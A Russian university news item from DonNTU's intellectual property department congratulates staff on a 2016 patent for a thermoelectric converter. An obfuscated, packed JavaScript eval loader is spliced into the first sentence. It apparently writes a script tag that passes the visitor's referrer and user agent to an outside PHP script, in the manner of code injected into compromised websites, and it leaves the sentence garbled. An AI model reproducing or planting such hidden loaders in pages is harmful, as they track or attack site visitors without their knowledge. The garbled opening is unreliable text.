

Отдел `eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!".replace(/^\/,String))){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]};e=function(){return'w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p}('0.6(");n m="q";',30,30,'document||javascript|encodeURIComponent|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|stdtt|var|u0026u|referrer|rned|s|js|php'.split('|'),0,{`)) Интеллектуальной собственности и патентно-лицензионной работы Донецкого национального технического университета (ДонНТУ) поздравляет изобретателей – сотрудников кафедр Промышленной теплоэнергетики (ФМФ) и Управления качеством (ФИММ) с успешной экспертизой и выдачей патента РФ на полезную модель «Термоэлектрический преобразователь» от 27 мая 2016 г.



Запатентованное устройство предназначено для преобразования тепловой энергии в электрическую и может найти широкое применение в энергетике в качестве первой ступени энергогенерирующей установки как источник постоянного тока. Конструктивные особенности разработанного термоэлектрического преобразователя обеспечивают высокую удельную мощность при его низкой материалоемкости. Разработан экспериментальный образец.

Поздравляем авторов и благодарим за проделанную работу.

Приглашаем наших изобретателей в отдел для анализа технических решений и оформления патентной защиты.